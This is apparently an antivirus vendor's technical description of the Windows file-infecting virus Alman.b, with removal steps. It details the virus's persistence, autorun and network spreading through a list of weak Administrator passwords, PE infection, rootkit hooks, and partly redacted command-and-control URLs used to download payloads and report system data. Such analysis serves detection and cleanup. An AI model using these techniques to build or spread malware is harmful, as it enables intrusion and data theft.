Virus.Win32.Alman.b

by Atlantis on April 18th, 2012 in Malware Descriptions.

Detect: Virus.Win32.Alman.b
Platform: Win32
Type: Virus
Virus body size: ~38 KB

Summary

It is a malware which infects executable PE-EXE files.

 Technical Details 

Installation

Being activated, the virus extracts a dynamic library (DLL) from its body to the Windows root catalog under the "linkinfo.dll" name:

%Windir%\linkinfo.dll

The file is 46592 bytes in size.

md5: 38FEE4EC44DF464D5C998629498D6176

In addition, it extracts the following driver from its body:

%System%\drivers\nvmini.sys

The driver is preliminarily saved in the temporary file under the "IsDrv118.sys" name:

%System%\drivers\IsDrv118.sys

The program is implemented as an NT core driver (kernel mode driver). It is 17152 bytes in size.

md5: 01F4112EE9F2E11B8E952E4FF026B319

To launch a created driver, the virus creates a service with the "nvmini" name which is launched on each system startup:

[HKLM\SYSTEM\CurrentControlSet\Services\nvmini]

"DisplayName" = "NVIDIA Compatible Windows Miniport Driver"

"ImagePath" = "%System%\drivers\nvmini.sys"

"Group" = "Pointer Port"

"ErrorControl" = "0"

"Start" = "2"

"Type" = "1"

 

Propagation

The virus copies its executable file to all logical and removable disks under the "boot.exe" name:

X:\boot.exe

md5: 54a821b720f0088789e3a98776c5fdd3

Then, the virus creates an "autorun.inf" file in the root directory of each catalog:

X:\autorun.inf

which runs the virus executable file each time the user opens an infected disk by Windows Explorer,

where <X> – a disk letter.

The worm set a “hidden” attribute for all created files.

To infect files across the network, the virus attempts to connect to the remote machines using the "Administrator" account and one of the following passwords:

password1

monkey

password

abc123

qwerty

letmein

root

mypass123

owner

test123

love

admin123

qwer

!@#$%^&*()

!@#$%^&*(

!@#$%^&*

!@#$%^& !@#$%^

!@#$%

asdfgh

asdf

!@#$

654321

123456789

12345

Aaa

123

111

1

admin

Afterwards, it copies itself to the remote machine as "setup.exe":

C$\setup.exe

 

File Infection

The virus injects the "%Windir%\linkinfo.dll" library code to the explorer.exe process address space. The injected code scans available logic and network drives as well as USB flash drives to search for files that can be infected and infects them.

While infecting, the virus expands the last PE-section of the file being infected and copies its encrypted body to the directory. Afterwards, it redirects the entry point of the program to its body.

The virus infects all Windows (PE-EXE) executable files. Files with the following extensions are not infected:

wooolcfg.exe

woool.exe

ztconfig.exe

patchupdate.exe

trojankiller.exe

xy2player.exe

flyff.exe

xy2.exe

au_unins_web.exe

cabal.exe

cabalmain9x.exe

cabalmain.exe

meteor.exe

patcher.exe

mjonline.exe

config.exe

zuonline.exe

userpic.exe

main.exe

dk2.exe

autoupdate.exe

dbfsupdate.exe

asktao.exe

sealspeed.exe

xlqy2.exe

game.exe

wb-service.exe

nbt-dragonraja2006.exe

dragonraja.exe

mhclient-connect.exe

hs.exe

mts.exe

gc.exe

zfs.exe

neuz.exe

maplestory.exe

nsstarter.exe

nmcosrv.exe

ca.exe

nmservice.exe

kartrider.exe

audition.exe

zhengtu.exe

 

System Infection Detection

It is possible to detect a hidden driver in the system with the help of the GMER AntiRootkit:

 

Payload

To control the uniqueness of its process in the system, the virus creates a unique identifier with the following name

PNP#DMUTEX#1#DL5

It ends the other malicious program processes and deletes their files from a hard drive:

sxs.exe

lying.exe

logo1_.exe

logo_1.exe

fuckjacks.exe

spoclsv.exe

nvscv32.exe

svch0st.exe

c0nime.exe

iexpl0re.exe

ssopure.exe

upxdnd.exe

wdfmgr32.exe

spo0lsv.exe

ncscv32.exe

iexplore.exe

iexpl0re.exe

ctmontv.exe

explorer.exe

internat.exe

lsass.exe

smss.exe

svhost32.exe

rundl132.exe

msvce32.exe

rpcs.exe

sysbmw.exe

tempicon.exe

sysload3.exe

run1132.exe

msdccrt.exe

wsvbs.exe

cmdbcs.exe

realschd.exe

With that, these files cannot be located in the following catalogs:

\QQ

\WINNT\

\WINDOWS\

LOCAL SETTINGS\TEMP\

Visiting the following URL, the virus gets a list of files to be downloaded from the Internet:

http://ftp.db***829.info/ok.gif

The URL did not respond when the description was created.

The virus downloads files available in the list and saves them to the temporary folder for the current user. Then, the virus launches the files for execution.

It informs an intruder about free space available on the local disk (C:), OS and Internet Explorer versions, as well as inform whether antivirus software is installed on PC.

The information is sent using parameters of the following HTTP request to the intruder server:

http://info.s***1.com/xxx.asp?action=post&HD=< free space percentage>&OT=<os version>&IV=<IE version>&AV=<drivers installed>

In addition, the virus can get its updated file from the intruder site. It saves the file to the following catalog with the "AcLue.dll" name:

%WinDir%\AppPatch\AcLue.dll

The virus hides its files using the "%System%\drivers\nvmini.sys" driver:

nvmini.sys

linkinfo.dll

autorun.inf

boot.exe

blocks deleting a system registry key that runs a "nvmini" service as well as blocks downloading drivers with the following names:

ISPUBDRV

ISDRV1

RKREVEAL

PROCEXP

SAFEMON

RKHDRV10

NPF

IRIS

NPPTNT

DUMP_WMIMMC

SPLITTER

EAGLENT

substitutes processors of the following functions in KeServiceDescriptorTable:

NtDeleteKey

NtDeleValueKey

NtEnumerateKey

NtQueryDirectoryFile

NtLoadDriver

The virus installs system notifiers which block the processes loading the following DLL:

UPXDHND.DLL

CMDBCS.DLL

WSVBS.DLL

MDDDSCCRT.DLL

RUND11.DLL

LGSYM.DLL

RDSHOST.DLL

RDFHOST.DLL

RDIHOST.DLL

RPCS.DLL

NOTEPAD.DLL

DLLHOSTS.DLL

WINDHCP.DLL

RICHDLL.DLL

DLLWM.DLL

 

Removal Recommendations

  1. Delete the registry key (How to Work with System Registry):
  2. [HKLM\SYSTEM\CurrentControlSet\Services\nvmini]

    "DisplayName" = "NVIDIA Compatible Windows Miniport Driver"

    "ImagePath" = "%System%\drivers\nvmini.sys"

    "Group" = "Pointer Port"

    "ErrorControl" = "0"

    "Start" = "2"

    "Type" = "1"

  3. Delete the following files:
  4. %Windir%\linkinfo.dll

    %System%\drivers\nvmini.sys

    %System%\drivers\IsDrv118.sys

    X:\boot.exe

    X:\autorun.inf

    C$\setup.exe

    %WinDir%\AppPatch\AcLue.dll

  5. Delete all virus copies from the hard drive.
  6. Run a full scan of your computer using the Antivirus program with the updated definition database (Download Ad-Aware Free).